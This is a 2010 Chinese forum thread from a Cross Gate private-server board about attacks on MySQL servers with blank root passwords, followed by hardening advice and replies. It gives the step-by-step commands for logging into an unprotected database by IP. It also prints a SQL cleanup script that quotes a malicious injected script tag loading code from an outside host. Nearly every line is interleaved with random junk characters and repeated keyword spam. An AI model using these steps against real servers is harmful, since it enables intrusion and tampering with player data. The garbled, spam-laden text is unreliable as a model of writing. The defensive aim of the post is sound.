Board logo

标题: [魔力私服分享] 自己总结的黑客与反黑技术【申精】 [打印本页]

作者: rmy007ivy    时间: 2010-8-1 13:00     标题: 自己总结的黑客与反黑技术【申精】

最近我做技术的服务器数据库常常被人入侵,在使用数据库3306端口下,默认用户名是root,默认的密码为空。许多人安装完NAVICAT就不修改用户名和密码,数据库可以说没有任何防御。
& Y' l  K2 b+ E2 ^; x" T% S先看看黑客是如何入侵的:魔力私服,最新魔力宝贝私服技术交流  S7 U) x" o$ K+ g* S: n6 B3 N
方法一,使用LINUIX链接MYSQL,MySQL用户root密码为空的攻击方法——黑客不用知道数据库密码,知道IP就可以攻击
1 u: Z' u5 M# j: F7 A: q—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート
1、连接到你的mysql 服务器
7 l3 _: v5 S' o  f魔力私服,最新魔力宝贝私服技术交流—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート) m; \0 C) Z6 f2 a) S7 b2 Z; j
mysql -u root -h IP
. o" ?; {$ M. q, H( D魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表mysql.exe 这个程序在你安装了mysql的的bin目录中 (这步成功就可以连接到你的数据库,为所欲为,如果网站和服务端不分离,使用个虚拟主机IP查询器就可以做到)魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表4 ~" N9 D1 N' v
—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート% P& R7 J% j( k6 d* P
2、黑客查询来服务器中有些什么数据库 魔力私服,最新魔力宝贝私服技术交流1 N( C/ f1 E- k4 |; X3 F7 K

! o4 F5 E" v7 Z. L8 o2 f魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表mysql>show databases;
" w3 a$ M3 U; Y$ W) @魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表+ t  G2 ~. q$ `2 g' E6 Y
mysql默认安装时会有mysql、test这两个数据库魔力私服,最新魔力宝贝私服技术交流8 d- P2 o7 i( h; h9 ?6 I
妖城在线论坛4 _8 B. X# ^4 q! I2 B
3、黑客进入数据库
5 i, j0 F; n7 V0 nbbs.mocwww.com
3 d1 `& H/ M: P* ]. q/ Abbs.mocwww.commysql>use test; 7 C7 O0 S3 ~8 u  |4 d

/ j& a" V! a( s# L8 n4、查看进入数据库中有些什么数据表
4 J6 K! B2 p2 W( I/ j: T: O# Bbbs.mocwww.com
" u# a; r0 B' ]魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表mysql>show tables; 玩家资料基本都在里面,游戏资料基本都在里面魔力私服,最新魔力宝贝私服技术交流4 v7 [* @7 q4 i

2 a& d7 q6 C: Z  zbbs.mocwww.com至此,你已经被黑了。黑客可以任意改动玩家资料,包括安全码,用户名,制作满D宠物,给宠物加BT技能,制作BT道具等。
# W5 t8 Q/ u# @  y9 d" ~

1 Y) a+ P, K, N- P. D( H方法二:使用NAVICAT连接# ^3 g6 W: r; \8 `$ ~
, i% L" K7 f! o1 W
如果数据库最高权限用户名是root的情况下,可以用navicat连接,那些不改root用户密码或密码为空的,很容易被连接,在知道IP和数据库名是root的情况下,也可以使用字典等木马盗号工具实现。因此root这个用户名一定要改。
7 P" Y7 z& A; h" S6 o5 F; g) L- |妖城在线论坛
* e# }* P5 Y  ~7 `+ b2 p% J—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート*****************************************************************************分割线**************************************************************************—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート3 e1 V$ F1 T2 U' N" L# j8 K; S, k
防御方法:1、修改数据库用户名:rootbbs.mocwww.com: b. f- F3 b3 L, q# s
打开navicat,右上角找到
; \5 o% C2 r* h* k2 N* J
% D5 C) @8 x# y- c% N修改用户名; w5 r2 z; B* Y
, u9 P9 ~0 T: r1 G
—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート7 R3 z' C& n! p% }$ m4 N/ h9 @0 A
魔力私服,最新魔力宝贝私服技术交流9 H8 c& a% {( ~2 x; T
改成你想要的,比如:xiaotousiba(小偷死吧!)注:这里的用户名应改为root开头的字符串,比如:root1234别问我为什么,LINUX判别很奇怪改完后,打开相应的setup.cf妖城在线论坛& ?% {7 |6 _: V" ^* p6 a: i
#数据库用户名妖城在线论坛4 X3 d: {8 }8 `$ P9 d3 z% A
dbusername=root(改成相应的用户名)妖城在线论坛: X5 ]6 f* N6 ?' q4 b( t0 y

) Y) V; [, p5 i5 O- y, ~. p( J% X) B2、进一步防御方法:与服务器商联系,测试并更换3306端口,使用其他端口。魔力私服,最新魔力宝贝私服技术交流( U" V  b' r: Z# Z

" N+ o0 d1 e) L1 o0 Y3、安装两个版本的navicat(数据库图形工具),win版和LINUX版。LINUX版放在home文件下,win版的所有用户名均可删除魔力私服,最新魔力宝贝私服技术交流! U7 D, f4 P/ t( C# c% T( D
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表# G0 H  C2 a4 c5 W
4、安装完成后修改远程用户名和密码。具体方法:右键——我的电脑——本地组和用户——用户(比如:adminstrator重命名为你想要的,密码也改
* w, o+ q& K% A2 v) G! W, [—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート
( Z: G  e! A  P' E—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート5、修改网站后台的admin的用户名和密码,有可能用md5收费密码。bbs.mocwww.com! z2 p6 Q$ t, L" ?! P
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表6 @+ r9 H! X: P) k
+ t# l: E5 L# X1 a' j
6、清除SQL被植入恶意病毒代码的语句,如果需要妖城在线论坛. ^9 ?/ l# N1 `$ ]. D9 T: ^! U
使用SQL分析查询器(附件内)
: J; J* F: H/ [' ~! I$ [8 zbbs.mocwww.com在SQL查询分析器执行以下代码就可以了。 魔力私服,最新魔力宝贝私服技术交流: `0 x$ |+ p% Y3 \$ E
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表% p: c( r  |7 x9 n  G9 R
01.declare @t varchar(255),@c varchar(255)
6 N0 P1 v5 q* v魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表妖城在线论坛- e# |. t# M8 w9 O+ v
02.declare table_cursor cursor for select a.name,b.name 妖城在线论坛$ N) J; H8 w+ o! Y2 e+ Y+ M2 Q* H

& L8 h0 s2 f" A* O! w5 B# s  s% D8 `7 ibbs.mocwww.com03.from sysobjects a,syscolumns b ,systypes c
' L# _; ?, }. k7 ]+ C+ F7 J9 e/ C; y/ p妖城在线论坛' A; o- g. B4 y  s2 D! e9 T
04.where a.id=b.id and a.xtype='u' and c.name
3 a  u: y0 }' {! {5 Dbbs.mocwww.com—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート0 u$ r2 O! F( h# _1 t2 M3 B7 `
05.in ('char', 'nchar', 'nvarchar', 'varchar','text','ntext')
% a0 y/ K0 ^* s8 B, m/ ?魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表
' [; ~; [/ x5 T妖城在线论坛06.declare @str varchar(500),@str2 varchar(500) bbs.mocwww.com) a" D# b. ^. |) Z- m* f

# I" V9 c3 F, O+ d6 Z—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート07.set @str='<script src=http://r01.3322.org/c.js></script>'/*要替换的内容*/
  d5 _. Z: h4 E+ I% s- u# U. y; [魔力私服,最新魔力宝贝私服技术交流
4 x/ Z  [& s; p魔力私服,最新魔力宝贝私服技术交流08.set @str2='' —魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート7 |' A: H5 }6 y* W; j% b! ^
—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート* M5 S8 [. C+ |" b5 z' e
09.open table_cursor bbs.mocwww.com4 N$ E# M9 E8 g  H

! c1 }& N# F; M10.fetch next from table_cursor 魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表$ \' L! h9 c/ S6 @
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表2 v1 A: {* f: `
11.into @t,@c while(@@fetch_status=0)
4 j. v7 t+ j; c+ M魔力私服,最新魔力宝贝私服技术交流/ k+ L9 m6 x0 T5 I& h) l
12.begin exec('update [' + @t + '] set [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str+''','''+ @str2 +''')') —魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート" `% v7 b8 f- U# j
魔力私服,最新魔力宝贝私服技术交流, m+ w6 g. z; }$ M; |; v" Z
13.fetch next from table_cursor 14.into @t,@c end close table_cursor deallocate table_cursorbbs.mocwww.com- l! T$ [, ^2 L& ~
妖城在线论坛. i3 H5 w3 O; j7 r
4、以下有23个方面关于MySQL安全问题,应进一步注意,具体如下:
4 [! ~3 ~6 o( o& G- H1 O0 L魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表1 C( M9 c4 @, t! Y
   1.如果客户端和服务器端的连接需要跨越并通过不可信任的网络,那么就需要使用SSH隧道来加密该连接的通信。 妖城在线论坛' y3 F6 ^9 w, T- o
—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート' B  k1 [" T& Q* g7 M# n/ [5 S# {$ p
  2.用set password语句来修改用户的密码,三个步骤,先“mysql -u root”登陆数据库系统,然后“mysql> update mysql.user set password=password('newpwd')”,最后执行“flush privileges”就可以了。 + s6 E! q1 {- ?5 W$ a

& e$ k' I: b& I: F% `% R- M妖城在线论坛  3.需要提防的攻击有,防偷听、篡改、回放、拒绝服务等,不涉及可用性和容错方面。对所有的连接、查询、其他操作使用基于ACL即访问控制列表的安全措施来完成。也有一些对SSL连接的支持。
( @7 a9 l  V" [& j3 M2 E# p& a
4 X6 g: k" W( }! }0 O6 j—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート  4.除了root用户外的其他任何用户不允许访问mysql主数据库中的user表; ! R0 _1 O1 _# h& j
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表- ]8 c- k" m9 z5 B2 }7 f
  加密后存放在user表中的加密后的用户密码一旦泄露,其他人可以随意用该用户名/密码相应的数据库; 妖城在线论坛9 u9 W7 G6 b* W

: u5 T3 M* E2 f2 X妖城在线论坛  5.用grant和revoke语句来进行用户访问控制的工作;
) K7 z) P  f2 q' j妖城在线论坛—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート( ]- }0 }! u& @/ Y
  6.不使用明文密码,而是使用md5()和sha1()等单向的哈系函数来设置密码;
* c8 }' s  d2 J* X: x# ebbs.mocwww.com
9 x3 Z' b0 R7 I, Z妖城在线论坛  7.不选用字典中的字来做密码; 魔力私服,最新魔力宝贝私服技术交流( S1 x. \) v9 c  a- @6 @) v
妖城在线论坛% d. A# F/ g( u9 j+ u  D' b* y6 Z, S& W) C
  8.采用防火墙来去掉50%的外部危险,让数据库系统躲在防火墙后面工作,或放置在DMZ区域中;
) e$ D7 C+ A8 j2 S. [, C1 L* s
( C2 e& c! ^! B% l! E* e7 I魔力私服,最新魔力宝贝私服技术交流  9.从因特网上用nmap来扫描3306端口,也可用telnet server_host 3306的方法测试,不能允许从非信任网络中访问数据库服务器的3306号TCP端口,因此需要在防火墙或路由器上做设定; 魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表) E) P$ m* N1 _/ p( C7 H
—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート# w% H! W$ L7 i/ |9 }7 W( h
  10.为了防止被恶意传入非法参数,例如where ID=234,别人却输入where ID=234 OR 1=1导致全部显示,所以在web的表单中使用''或""来用字符串,在动态URL中加入%22代表双引号、%23代表井号、%27代表单引号;传递未检查过的值给mysql数据库是非常危险的; 魔力私服,最新魔力宝贝私服技术交流7 [, D1 L! I2 K/ u# K5 _) i
魔力私服,最新魔力宝贝私服技术交流7 I% [( d) @" Y' M- Z
  11.在传递数据给mysql时检查一下大小;
: F" k6 Y: P* N  ]$ E/ V5 p" @& i妖城在线论坛妖城在线论坛% P: ^( N3 m# Q1 P! T, X
  12.应用程序需要连接到数据库应该使用一般的用户帐号,只开放少数必要的权限给该用户;
- F4 `, U0 u+ Y% D5 [/ m* d% R* v* l
' D* U9 x* c: v5 l6 l$ fbbs.mocwww.com  13.在各编程接口(C C++ PHP Perl Java JDBC等)中使用特定‘逃脱字符’函数; $ r3 a8 P8 n* v
bbs.mocwww.com7 Z0 A6 |: B6 W+ p; x* k$ t/ e1 {, e) i
  在因特网上使用mysql数据库时一定少用传输明文的数据,而用SSL和SSH的加密方式数据来传输; bbs.mocwww.com9 A. ~! g# a' N
妖城在线论坛* m4 ?9 N8 g; N1 M4 X- Z2 e
  14.学会使用tcpdump和strings工具来查看传输数据的安全性,例如tcpdump -l -i eth0 -w -src or dst port 3306   strings。以普通用户来启动mysql数据库服务;
# m- s4 g2 D+ Y- l. p' _2 x2 e9 p魔力私服,最新魔力宝贝私服技术交流魔力私服,最新魔力宝贝私服技术交流4 c( }7 e3 P( b- _4 y  w- {
  15.不使用到表的联结符号,选用的参数 --skip-symbolic-links; * J+ P8 ?* \- Q, R# Y% a1 n
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表7 G9 g' X( ?+ @: G+ a
  16.确信在mysql目录中只有启动数据库服务的用户才可以对文件有读和写的权限; ( [: G. a1 c( H+ f) J! h
bbs.mocwww.com$ q6 h, b6 q- z8 _4 f0 D6 a5 Y
  17.不许将process或super权限付给非管理用户,该mysqladmin processlist可以列举出当前执行的查询文本;super权限可用于切断客户端连接、改变服务器运行参数状态、控制拷贝复制数据库的服务器; 魔力私服,最新魔力宝贝私服技术交流* z, H$ ]" b0 g* u( u3 s

: @! p; K/ ~: W+ ^  ebbs.mocwww.com  18.file权限不付给管理员以外的用户,防止出现load data '/etc/passwd'到表中再用select 显示出来的问题;
+ r3 n& |4 ?& f: o  y魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表魔力私服,最新魔力宝贝私服技术交流0 E9 i+ B6 [) z- y: ~( O& q( O- g
  19.如果不相信DNS服务公司的服务,可以在主机名称允许表中只设置IP数字地址; 魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表' ]( d& W+ R6 h

' ^  d- n: J. k# _妖城在线论坛  20.使用max_user_connections变量来使mysqld服务进程,对一个指定帐户限定连接数; bbs.mocwww.com' J+ S8 Y) d: i8 V

  F/ D' M& I% p1 {魔力私服,最新魔力宝贝私服技术交流  21.grant语句也支持资源控制选项; 魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表* C$ X; x* J0 \: t. j
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表) [  q/ v4 s5 T! J3 `$ ]
  22.启动mysqld服务进程的安全选项开关,--local-infile=0或1 若是0则客户端程序就无法使用local load data了,赋权的一个例子grant insert(user) on mysql.user to 'user_name'@'host_name';若使用--skip-grant-tables系统将对任何用户的访问不做任何访问控制,但可以用mysqladmin flush-privileges或mysqladmin reload来开启访问控制;默认情况是show databases语句对所有用户开放,可以用--skip-show-databases来关闭掉。
8 F8 Y( i8 M# E, F6 f. Wbbs.mocwww.com
( i  {' E) o+ K! ?% G% N+ h6 Y—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート  23.碰到Error 1045(28000) Access Denied for user 'root'@'localhost' (Using password:NO)错误时,你需要重新设置密码,具体方法是:先用--skip-grant-tables参数启动mysqld,然后执行mysql -u root mysql,mysql>update user set password=password('newpassword') where user='root';mysql>Flush privileges;,最后重新启动mysql就可以了。
8 ^" p3 \: Z7 S- C# @( K5 a) Cbbs.mocwww.com魔力私服,最新魔力宝贝私服技术交流. {2 m3 S+ B2 t  \
三,防止黑客知道远程端口入侵远程桌面的方法。(感谢魔力人 忧 提供)
- B* i9 J" B- u! U+ }/ Kbbs.mocwww.com
1 H9 Y5 F* q. Z7 [- l* o—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート
0 d( X; ]6 d, v$ D# h魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表远程桌面的端口默认为:3389,只要是这个远程桌面前面的勾如果选择上了,
( R9 E. q6 n$ b7 u# A, g就说明你的电脑开启了3389端口,那么对方就可以利用3389远程直接登陆您的系统。。。
! N/ P4 C) }8 ~, T魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表妖城在线论坛: \9 h3 \6 ]# Z
不要打上这个勾,就关掉了3389!开始,运行,输入mstsc,在弹出的对话诓中输入对方IP,
  j& R6 r3 a* a( {魔力私服,最新魔力宝贝私服技术交流就可以远程连接对方电脑了,当然还需要对方电脑的用户名和密码。。。。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表* g0 r, ?# N9 E( s2 Y6 ?% C, j& Q

4 h( I! L# s3 \, @2 h$ l& t妖城在线论坛一般XP系统的帐号密码就是默认的,或者使用的是new,而密码为空。。。3 z) a9 m; @4 {% G  X) K

* G+ m3 @- n+ L/ ^7 H妖城在线论坛这样的用户如果开启了3389的话,很容易变成别人的肉鸡。。。妖城在线论坛7 j/ @/ V! g& d4 p" F1 T7 ]" _
所以大家应该及时把系统帐号安全保护好。。。魔力私服,最新魔力宝贝私服技术交流" W8 B" l/ `7 R  s( T

$ k& ?( Q! _* J* H' }妖城在线论坛关掉3389端口,或者把3389端口修改成其它数字,
, b1 [) x8 J! [7 K$ x魔力私服,最新魔力宝贝私服技术交流让别人扫描不出来。。。
: H7 F: {( c4 i1 q4 W# Z: bbbs.mocwww.com把系统默认用户名改名并禁止使用,设置好密码。。。魔力私服,最新魔力宝贝私服技术交流+ F, I( ^0 c" U& x
把其它不用的帐号全部停用。新建一个管理员帐号设置好密码。。。妖城在线论坛, ?" x# ], f5 r
从而保证系统安全。。。
3 s# z) f) v: c2 L7 I魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表魔力私服,最新魔力宝贝私服技术交流- \5 j* U. O2 d: b5 O3 j: P, D+ N
在任务管理器中可以看出来用户的活动进程也可以用查看本机端口连接情况来查看的。。。。
0 W  |8 B9 O- O% c  A, l1 ]. P! |. _  l魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表开始,运行 cmd   输入netstat -an 来查看与本机有哪些连接3389端口是Windows 2000(2003) Server
) N3 C  j) Z2 _  b) g妖城在线论坛魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表+ r/ K5 b" T) W/ ~* p& n. x% v
远程桌面的服务端口,可以通过这个端口,
1 d) n4 K. _0 n: N$ A9 M6 E妖城在线论坛用"远程桌面"等连接工具来连接到远程的服务器,如果连接上了,; }1 c- J- d) f/ E
输入系统管理员的用户名和密码后,将变得可以像操作本机一样操作远程的电脑,
& z, b* g& E2 s3 }魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表
# W* c, s- T( J+ |魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表因此远程服务器一般都将这个端口修改数值者者关闭.
3 d: m7 i2 h. Y2 P# c1 W—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート修改数值的话需要修改注册表的两个地方:
& R' `1 Y+ t) \, `* H7 T—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート第一个地方: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp] PortNumber值,默认是3389,修改成所希望的端口,比如6000 第二个地方: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] PortNumber值,妖城在线论坛4 Z* w9 o) Q2 r5 B8 f, f
默认是3389,修改成所希望的端口,比如6000 现在这样就可以了。  L  h6 h, |9 |
魔力私服,最新魔力宝贝私服技术交流' H  `. G4 ]+ D! W' x- ~- G1 B
重启系统就可以了. 你如果觉得修改数值不够安全,
- m' J$ ?' m- f' A魔力私服,最新魔力宝贝私服技术交流可以把这个端口屏蔽掉: 一是在网卡的端口过滤里边,8 r# s4 R7 S! _( O- n, C% p
只开放你需要的端口,具体是在tcp/ip的属性设置里头有个"高级"按键,魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表7 Y' d! Y! Y. y, ?8 `& D* o
然后点里面最后一个"选项"按钮,在tpc/ip筛选里面,只允许你想开放的端口;
! |4 A! J/ `% X( P, y( u- d: K—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート此外,可以安装一个防火墙,也可以达到阻止别人访问你3389端口的目的。
0 W/ R/ |0 i: U  Gbbs.mocwww.com
2 I$ E6 P; N' _& B3 e5 O[ 本帖最后由 rmy007ivy 于 2010-8-1 17:14 编辑 ]

图片附件: 未命名.jpg (2010-8-1 13:00, 2.13 KB) / 该附件被下载次数 184
http://bbs.mocwww.com/attachment.php?aid=13667



图片附件: 未命名1.jpg (2010-8-1 13:00, 1.75 KB) / 该附件被下载次数 129
http://bbs.mocwww.com/attachment.php?aid=13668



图片附件: 未命名2.jpg (2010-8-1 13:00, 16.83 KB) / 该附件被下载次数 161
http://bbs.mocwww.com/attachment.php?aid=13669



附件: SQL查询分析器.rar (2010-8-1 13:06, 1.23 MB) / 该附件被下载次数 206
http://bbs.mocwww.com/attachment.php?aid=13670

附件: 黑客虚拟主机查询器.rar (2010-8-1 13:06, 261.19 KB) / 该附件被下载次数 163
http://bbs.mocwww.com/attachment.php?aid=13671

图片附件: 01300000173424121292059892967.jpg (2010-8-1 16:55, 35.19 KB) / 该附件被下载次数 116
http://bbs.mocwww.com/attachment.php?aid=13672


作者: rmy007ivy    时间: 2010-8-1 13:42

占楼编辑,防御第二弹,楼下说没用的,怎么不把自己的经验分享一下呢?魔力私服,最新魔力宝贝私服技术交流( a; }  r% O2 g
1、关于利用软件窃取网页系统的办法及原理。。。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表4 r3 G% G; |5 j% C
2、关于利用网页系统漏洞(现在的魔力网页大部分都是叶子后台,或叶子后台改编,黑客早就研究透了,)入侵的方法及防御。。。
* ?& O' ^: p6 R/ N妖城在线论坛3、植入rootkit及防御办法。。。魔力私服,最新魔力宝贝私服技术交流7 o" R# Y. @" w9 L8 Y0 U7 e
4、关于LINUX内部的webshell问题。。。—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート% c7 D7 `9 O5 D, ?
这些我会一一发出来和大家讨论。但是我的办法发了,黑客又都知道了。所以就没用了,正在纠结到底要不要发
+ x2 j) ~% d6 |6 [1 o) c: C$ O—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート魔力私服,最新魔力宝贝私服技术交流0 X" {8 k8 ~( M5 E/ q* a7 x
[ 本帖最后由 rmy007ivy 于 2010-8-2 10:33 编辑 ]
作者: rmy007ivy    时间: 2010-8-2 10:35

楼上说没用的,为什么不把自己的经验分享一下呢?
作者: rmy007ivy    时间: 2010-8-2 11:13

呵呵,谢谢指教,口风真严,算了,自己研究
作者: 煙頭    时间: 2010-8-2 14:50

我也领教了。。
作者: rmy007ivy    时间: 2010-8-14 13:30

这篇东西不足以申精吗?
作者: rootlinux    时间: 2010-8-14 17:55

是不足以的,妖城有很多帖子都比你的好。
' d' t8 v! @3 J6 r! n) v+ ?bbs.mocwww.com你那个其实只要在本机开启3306对外是不会映射的TELNET 3306也不通,所以没关系什么工具都连不上,如果用FTP空间的话把帐号和密码改成强些不就得了。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表% A( V; e7 M% h6 d
远程连接把3389改下也就得了。也不麻烦。bbs.mocwww.com. n/ r- x# G" I( U# S/ A
百度一大堆资料bbs.mocwww.com1 n8 C1 q' y. K5 @- ]) n
bbs.mocwww.com, m  s; L2 [+ Q( V" g: ~* ^% b% ?
[ 本帖最后由 rootlinux 于 2010-8-14 17:58 编辑 ]




欢迎光临 妖城在线论坛 (http://bbs.mocwww.com/) Powered by Discuz! 6.0.0